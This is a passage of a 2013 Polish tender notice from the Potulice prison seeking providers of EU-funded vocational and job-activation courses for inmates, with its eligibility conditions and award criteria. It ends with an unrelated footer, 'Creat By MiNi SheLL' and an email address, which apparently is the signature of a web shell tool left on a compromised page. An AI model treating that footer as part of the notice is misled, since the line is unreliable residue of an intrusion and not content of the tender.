wykładowców, święta, dni wolne, awarie itp.); prowadzenie dokumentacji przebiegu szkolenia tj. m.in.: dziennika zajęć edukacyjnych zawierającego listę obecności, wymiar godzin i tematy zajęć edukacyjnych; programu nauczania, protokołu z egzaminu (jeżeli został przeprowadzony); rejestru wydawanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji; ankiet oceny szkolenia i wykładowcy dla uczestników i absolwentów szkolenia, dodatkową listę obecności podpisywaną przez poszczególnych uczestników kursu.  
16)	Wykonawca przeprowadza wśród uczestników szkolenia ocenę merytorycznego i technicznego przebiegu szkolenia m.in. na podstawie formularza ankiety oceniającej. 
17)	W przypadku zajęć praktycznych, wykonawca przed rozpoczęciem realizacji szkolenia wyszczególnia na piśmie sprzęt, urządzenia i ich ilości, jakie będą wykorzystywane podczas zajęć.
18)	Wykonawca odpowiada za przeszkolenie kursantów w zakresie BHP oraz za przestrzeganie warunków BHP w trakcie całego szkolenia.
19)	Szkolenie kończy się oceną nabytych umiejętności i wydaniem zaświadczeń o jego ukończeniu, zgodnie z rozporządzeniem MEN oraz MPiPS z dnia 12.10.1993r. w sprawie zasad i warunków podnoszenia kwalifikacji zawodowych i wykształcenia ogólnego dorosłych (Dz. U. Nr 103, poz. 472             z późn. zmianami) oraz rozporządzeniem MEN z dnia 11.01 2012r. (Dz. U. Nr 34 poz. 186 z 2012r) w sprawie kształcenia ustawicznego w formach pozaszkolnych oraz certyfikatu w zakresie zdobytych uprawnień. Oryginały          w/w dokumentów i ich kserokopie mają być potwierdzone za zgodność                  z oryginałem i przekazane do Zakładu Karnego w Potulicach.
20)	Wykonawca jest odpowiedzialny za jakość, zgodność z warunkami technicznymi i jakościowymi opisanymi dla przedmiotu zamówienia oraz              za należytą staranność przy realizacji zobowiązań umowy.
21)	Zamawiający nie ponosi odpowiedzialności za szkody wyrządzone przez Wykonawcę podczas wykonywania zamówienia.
22)	Ustalenia i decyzje dotyczące wykonywania zamówienia uzgadniane będą przez zamawiającego z ustanowionym przedstawicielem Wykonawcy.
23)	Wykonawca określa numery telefonów kontaktowych i faksu oraz innych danych niezbędnych dla sprawnego i terminowego wykonania zamówienia.
24)	Należność za usługę szkolenia zawodowego zostanie uregulowana przelewem, w terminie 30 dni, od daty otrzymania faktury przez zamawiającego za przeprowadzenie kursu.
25)	Niniejsza część postępowania dotycząca grupy 4 może zostać unieważniona na podstawie art. 93 ust. 1a ustawy Pzp.


5. Grupa 5 - zajęcia aktywizacyjno-wzmacniające
	 1)   Przedmiotem zamówienia jest usługa polegająca na zorganizowaniu              w roku 2013r. Szkolenia aktywizacyjnego dla skazanych w związku z realizacją projektu Aktywizacja społeczno zawodowa skazanych niepełnosprawnych oraz osób skazanych na karę pozbawienia wolności na podstawie art. 209 §1 lub art. 207 §1 Kodeksu karnego w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
	2)	Usługa szkolenia aktywizacyjno-wzmacniającego osadzonych zostanie realizowana w Zakładzie Karnym w Potulicach, zgodnie z wymaganiami określonymi  w niniejszej siwz. CPV: 80500000-9.
	3)	ilość kursów: 2
4) ilość osób do przeszkolenia: 16, po 8 osób na kurs.  
5)	  Usługi szkolenia aktywizacyjno-wzmacniającego zostaną przeprowadzone 
do końca sierpnia 2013 r. w terminach określonych przez Zamawiającego.
6) Celem szkolenia jest nabycie przez beneficjentów podstawowych zagadnień związanych ze skutecznym radzeniem sobie na rynku pracy - zagadnienia: autoprezentacja; komunikacja z pracodawcą; rozmowa kwalifikacyjna; dokumenty aplikacyjne; sposoby poszukiwania pracy; poznawanie i odkrywanie swoich umiejętności i predyspozycji zawodowych.
7)	Szkolenia odbywać się będą w siedzibie Zamawiającego, w dni robocze, od poniedziałku do piątku, w wymiarze nie większym niż 8 godzin dziennie.
8)  Szkolenie trwa 20 godzin lekcyjnych (1 godz. = 45 min.).
9) Wykonawca zapewnia kadrę dydaktyczną o kwalifikacjach odpowiednich do prowadzenia zajęć psychokorekcyjnych oraz doradztwa zawodowego.
10) Przed rozpoczęciem szkolenia, wykonawca informuje beneficjentów ostatecznych o tym, że szkolenie jest współfinansowane z przez Unię Europejską - Europejski Fundusz Społeczny w ramach Programu Operacyjnego Kapitał Ludzki, oraz zapoznaje uczestników z szczegółowym programem szkolenia oraz przedstawia im harmonogram realizowanych zajęć.
11) Wykonawca ubezpiecza uczestników szkolenia od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniem.
12) Wykonawca zapewnia uczestnikom szkolenia wszelkie materiały i sprzęt niezbędny do przeprowadzenia szkolenia aktywizacyjnego, a Zamawiający         we własnym zakresie dostarczy sprzęt multimedialny.
13) Wykonawca przed rozpoczęciem realizacji szkolenia przedstawia program szkolenia, sporządzony zgodnie z Rozporządzeniem Ministra Sprawiedliwości w sprawie szczegółowych zasad i trybu prowadzenia nauczania w zakładach karnych z dnia 13 lutego 2004r. (Dz. U. Nr 37, poz. 337) oraz Rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 2 marca 2007r. w sprawie szczegółowych warunków prowadzenia przez publiczne służby zatrudnienia na rynku pracy (Dz. U. Nr 47, poz. 315) zawierający  w szczególności: nazwę i zakres szkolenia; czas trwania i sposób organizacji szkolenia; wymagania wstępne dla uczestników szkolenia; cele szkolenia; plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar,                         z uwzględnieniem, w miarę potrzeby, części teoretycznej i części praktycznej; treści szkolenia w zakresie poszczególnych zajęć edukacyjnych; wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych; sposób sprawdzania efektów szkolenia; dobranie poziomu wiedzy i doświadczenia wykładowców do tematyki szkolenia; przeprowadzenie kursu zgodnie                      z ustaloną liczbą godzin, bez względu na ewentualne przerwy (choroby wykładowców, święta, dni wolne, awarie itp.); prowadzenie dokumentacji przebiegu szkolenia tj. m.in.: dziennika zajęć edukacyjnych, programu nauczania, wymiar godzin i tematy zajęć edukacyjnych, protokołu z egzaminu (jeżeli został przeprowadzony), rejestru wydawanych zaświadczeń lub innych dokumentów potwierdzających ukończenie szkolenia i uzyskanie kwalifikacji, ankiet oceny szkolenia i wykładowcy dla uczestników i absolwentów szkolenia, listę obecności podpisywaną przez poszczególnych beneficjentów ostatecznych i wykładowcy. Lista obecności powinna być podpisana.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki. 2. Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty oświadczenia, o którym mowa w siwz rozdział IX, tj.: 1) podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu oraz o wpisaniu wykonawcy do rejestru instytucji szkoleniowych (załącznik nr 2 do siwz)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki. 2. Wykonawca spełnieni warunek, o którym mowa w art. 22 ust. 1 pkt 2 ustawy Pzp, określony w siwz rozdział VIII pkt 1 ppkt 2), tj. posiadania wiedzy i doświadczenia, jeżeli wykaże się, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie przeprowadził szkolenie dotyczące: a)	minimum jednego kursu przyuczającego do zawodu malarz - szpachlarz dla minimum 10 osób, lub szkolenia o podobnej tematyce, którego cel szkolenia był tożsamy z celem określonym w siwz w rozdziale III (grupa 1);
b)	minimum jednego szkolenia aktywizacyjnego dla minimum 10 osób,  którego cel szkolenia był tożsamy z celem określonym w siwz w rozdziale III (grupa 2);
c)	minimum jednego kursu przyuczającego do zawodu palacza C.O. dla minimum 10 osób, lub szkolenia o podobnej tematyce, którego cel szkolenia był tożsamy z celem określonym w siwz w rozdziale III (grupa 3);
d)	minimum jednego kursu przyuczającego do zawodu ogrodnik terenów zielonych dla minimum 10 osób, lub szkolenia o podobnej tematyce, którego cel szkolenia był tożsamy z celem określonym w siwz w rozdziale III (grupa 4);
e)	minimum jednego szkolenia aktywizacyjno-wzmacniającego dla minimum 10 osób,  którego cel szkolenia był tożsamy z celem określonym w siwz w rozdziale III (grupa 5);
f) na potwierdzenie wykonania usługi szkolenia wykonawca załącza do oferty dokumenty (np. referencje) wystawione po zrealizowaniu całości szkolenia, potwierdzające, że usługa została wykonana należycie. d) przez wykonanie usługi w okresie ostatnich trzech lat przed upływem terminu składania ofert (tj. od od 04.03.2010r. do 04.03 .2013r.), zamawiający rozumie zakończenie realizacji usługi w w/w okresie. e) wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia wykazują, że łącznie spełniają w/w warunek. 4) Wykonawca spełnieni warunek, o którym mowa w art. 22 ust. 1 pkt 3 ustawy Pzp, określony w siwz rozdział VIII pkt 1 ppkt 3), tj. dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia, jeżeli wykaże się, że osoby(a), które będą uczestniczyć w wykonywaniu zamówienia posiadają uprawnienia wynikające z ustawy o systemie oświaty (Dz. U. z 2004r. Nr 256, poz. 2572, z późn. zm.) oraz z rozporządzenia Ministra Edukacji Narodowej z dnia 15 grudnia 3. Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu, na podstawie złożonego do oferty wykazu, o którym mowa w siwz rozdział IX, tj.: 1) podpisany i wypełniony wykaz wykonanych usług w zakresie niezbędnym do wykazania spełniania warunku dotyczącego wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączenia dokumentu(ów) potwierdzającego, że te usługi zostały wykonane należycie - (załącznik nr 4 do siwz)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki. 2. Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty oświadczenia, o którym mowa w siwz rozdział IX, tj.: 1) podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu oraz o wpisaniu wykonawcy do rejestru instytucji szkoleniowych (załącznik nr 2 do siwz)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki. 2. Wykonawca spełnieni warunek, o którym mowa w art. 22 ust. 1 pkt 3 ustawy Pzp, określony w siwz rozdział VIII pkt 1 ppkt 3), tj. dysponowania odpowiednimi osobami zdolnymi do wykonania zamówienia, jeżeli wykaże się, że osoby(a), które będą uczestniczyć w wykonywaniu zamówienia posiadają uprawnienia wynikające z ustawy o systemie oświaty (Dz. U. z 2004r. Nr 256, poz. 2572, z późn. zm.) oraz z rozporządzenia Ministra Edukacji Narodowej z dnia 15 grudnia 2010r. w sprawie praktycznej nauki zawodu (Dz. U. z 2010r. Nr 244, poz. 1626). 1) Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia wykazują, że łącznie spełniają w/w warunek. 3. Zamawiający dokona oceny spełnienia warunku udziału w postępowaniu, na podstawie złożonego do oferty oświadczenia, o którym mowa w siwz rozdział IX, tj.: 1) podpisane oświadczenie, że osoby(a), które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia do prowadzenia szkoleń/kursów określonych w niniejszej siwz, wynikające z ustawy o systemie oświaty (Dz. U. z 2004r. Nr 256, poz. 2572, z późn. zm.) oraz z rozporządzenia Ministra Edukacji Narodowej z dnia 15 grudnia 2010r. w sprawie praktycznej nauki zawodu (Dz. U. z 2010r. Nr 244, poz. 1626) - (załącznik nr 5 do siwz)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Ocena spełnienia warunków udziału w postępowaniu zostanie dokonana na zasadzie: spełnia lub nie spełnia poszczególne warunki. 2. Zamawiający dokona oceny spełnienia poszczególnych warunków udziału w postępowaniu, na podstawie złożonego do oferty oświadczenia, o którym mowa w siwz rozdział IX, tj.: 1) podpisane oświadczenie, o spełnianiu warunków udziału w postępowaniu oraz o wpisaniu wykonawcy do rejestru instytucji szkoleniowych (załącznik nr 2 do siwz)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 65</li>
<li>2 - materiały szkoleniowe - 20</li>
<li>3 - doświadczenie - 10</li>
<li>4 - posiadanie akredytacji na przedmiot zamówienia - 5</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Strony ustalają, że treść umowy może ulec zmianie zgodnie z art. 144 ustawy Prawo zamówień publicznych (Dz. U. z 2010r. Nr 113, poz. 759, Nr 161, poz. 1078, Dz. U. z 2011r. Nr 5, poz. 13, Nr 28, poz. 143, Nr 87, poz. 484).
2.	Zmiany postanowień niniejszej umowy mogą dotyczyć w szczególności:
1)	nazwy, adresu oraz osób reprezentujących strony, a także osób wymienionych w § 5 pkt 1 i/lub w § 5 pkt 2;
2)	urzędowej stawki podatku VAT na świadczenie niniejszej usługi szkolenia;
3)	każdej zmiany, która jest korzystna lub neutralna dla zamawiającego, lub zmiany której nie można było przewidzieć na etapie prowadzonego postępowania o udzielenie zamówienia publicznego;
4)	terminów, o których mowa w § 2 pkt 1 i/lub w § 2 pkt 2.
3.	Zmiany postanowień niniejszej umowy wymagają potwierdzenia pisemnego w postaci aneksu.
4.	Strona wnioskująca o zmianę postanowień niniejszej umowy niezwłocznie i pisemnie powiadamia o tym fakcie drugą stronę, uzasadniając zmianę okolicznościami faktycznymi i prawnymi oraz przedkłada propozycję aneksu do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Karny, Aleja Parkowa 1, 89-120 Potulice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.03.2013 godzina 12:00, miejsce: W siedzibie zamawiającego, w sekretariacie.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> W ramach projektu Cykl szkoleniowo - aktywizacyjny służący podniesieniu kwalifikacji zawodowych osób pozbawionych wolności oraz przygotowaniu ich do powrotu na rynek pracy po zakończeniu odbywania kary pozbawienia wolności w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską  w ramach Europejskiego Funduszu Społecznego.
W związku z realizacją projektu Cykl szkoleniowo - aktywizacyjny służący podniesieniu kwalifikacji zawodowych osób pozbawionych wolności oraz przygotowaniu ich do powrotu na rynek pracy po zakończeniu odbywania kary pozbawienia wolności w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Grupa 1 - malarz - szpachlarz.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na zorganizowaniu  w roku 2013 szkolenia zawodowego dla skazanych w ramach projektu Cykl szkoleniowo - aktywizacyjny służący podniesieniu kwalifikacji zawodowych osób pozbawionych wolności oraz przygotowaniu ich do powrotu na rynek pracy po zakończeniu odbywania kary pozbawienia wolności w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską  w ramach Europejskiego Funduszu Społecznego.
2)    Usługa szkolenia zawodowego osadzonych zostanie realizowana  w Zakładzie Karnym w Potulicach, jako kurs malarz-szpachlarz, zgodnie z wymaganiami określonymi w niniejszej siwz. CPV: 80530000-8.
3)      Ilość kursów: 2.
4)       lość osób do przeszkolenia: 24, po 12 osób na kurs .
5)    Usługa szkolenia zawodowego zostanie przeprowadzona do końca sierpnia 2013 r. w terminie określonym przez Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. materiały szkoleniowe - 20</li>
<li>3. doświadczenie - 10</li>
<li>4. posiadanie akredytacji na przedmiot zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Grupa 2 - zajęcia aktywizacyjne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> )   Przedmiotem zamówienia jest usługa polegająca na zorganizowaniu              w roku 2013r. Szkolenia aktywizacyjnego dla skazanych w związku z realizacją projektu Cykl szkoleniowo - aktywizacyjny służący podniesieniu kwalifikacji zawodowych osób pozbawionych wolności oraz przygotowaniu ich do powrotu na rynek pracy po zakończeniu odbywania kary pozbawienia wolności w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
	2)	Usługa szkolenia aktywizacyjnego osadzonych zostanie realizowana              w Zakładzie Karnym w Potulicach, zgodnie z wymaganiami określonymi               w niniejszej siwz. CPV: 80500000-9.
	3)	ilość kursów: 2
4) ilość osób do przeszkolenia: 24, po 12 osób na kurs.  
5)	Usługi szkolenia aktywizacyjnego zostaną przeprowadzone do końca sierpnia 2013 r. w terminach określonych przez Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. materiały szkoleniowe - 20</li>
<li>3. doświadczenie - 10</li>
<li>4. posiadanie akredytacji na przedmiot zamówienia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Grupa 3 - palacz c.o..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Przedmiotem zamówienia jest usługa polegająca na zorganizowaniu w roku 2013 szkolenia zawodowego dla skazanych w związku z realizacją projektu Aktywizacja społeczno zawodowa skazanych niepełnosprawnych oraz osób skazanych na karę pozbawienia wolności na podstawie art. 209 §1 lub art. 207 §1 Kodeksu karnego w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanych przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
2)	Usługa szkolenia zawodowego osadzonych zostanie realizowana w Zakładzie Karnym w Potulicach, jako kurs przyuczający do zawodu palacz centralnego ogrzewania, zgodnie z wymaganiami określonymi w niniejszej siwz. CPV: 80530000-8.
3)	Ilość kursów: 1.
4)	Ilość osób do przeszkolenia: 8.
5)	Usługa szkolenia zawodowego zostanie przeprowadzona do dnia 31 sierpnia  2013 r. w terminie określonym przez Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. materiały szkoleniowe - 20</li>
<li>3. doświadczenie - 10</li>
<li>4. posiadanie akredytacji na przedmiot zamóweinia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Grupa 4 - ogrodnik terenów zielonych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1)	Przedmiotem zamówienia jest usługa polegająca na zorganizowaniu w roku 2013 szkolenia zawodowego dla skazanych w ramach projektu Aktywizacja społeczno zawodowa skazanych niepełnosprawnych oraz osób skazanych na karę pozbawienia wolności na podstawie art. 209 §1 lub art. 207 §1 Kodeksu karnego w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską  w ramach Europejskiego Funduszu Społecznego.
2)	Usługa szkolenia zawodowego osadzonych zostanie realizowana              w Zakładzie Karnym w Potulicach, jako kurs ogrodnik terenów zielonych, zgodnie z wymaganiami określonymi w niniejszej siwz. CPV: 80530000-8.
3)	Ilość kursów: 1.
4)	Ilość osób do przeszkolenia: 8
5)	 Usługa szkolenia zawodowego zostanie przeprowadzona do końca sierpnia 2013 r. w terminie określonym przez Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. materiały szkoleniowe - 20</li>
<li>3. doswiadzenie - 10</li>
<li>4. posiadanie akredytacji na przedmiot zamóweinia - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Grupa 5 - zajęcia aktywizacyjno-wzmacniające.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na zorganizowaniu              w roku 2013r. Szkolenia aktywizacyjnego dla skazanych w związku z realizacją projektu Aktywizacja społeczno zawodowa skazanych niepełnosprawnych oraz osób skazanych na karę pozbawienia wolności na podstawie art. 209 §1 lub art. 207 §1 Kodeksu karnego w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego.
	2)	Usługa szkolenia aktywizacyjno-wzmacniającego osadzonych zostanie realizowana w Zakładzie Karnym w Potulicach, zgodnie z wymaganiami określonymi  w niniejszej siwz. CPV: 80500000-9.
	3)	ilość kursów: 2
4) ilość osób do przeszkolenia: 16, po 8 osób na kurs.  
5)	  Usługi szkolenia aktywizacyjno-wzmacniającego zostaną przeprowadzone 
do końca sierpnia 2013 r. w terminach określonych przez Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 65</li>
<li>2. materiały szkoleniowe - 20</li>
<li>3. doświadczenie - 10</li>
<li>4. posiadanie akredtacji na przedmiot zamówienia - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com